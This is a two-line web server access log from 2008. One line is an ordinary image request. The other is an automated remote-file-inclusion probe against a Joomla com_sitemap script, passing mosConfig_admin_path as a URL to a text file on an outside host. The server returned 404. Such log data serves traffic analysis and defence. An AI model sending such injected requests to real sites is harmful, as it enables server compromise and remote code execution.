72.199.235.196 - - [20/Sep/2008:10:50:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-134.jpg HTTP/1.1" 200 429690 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:50:50 -0700] "GET /logs/access_080524.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
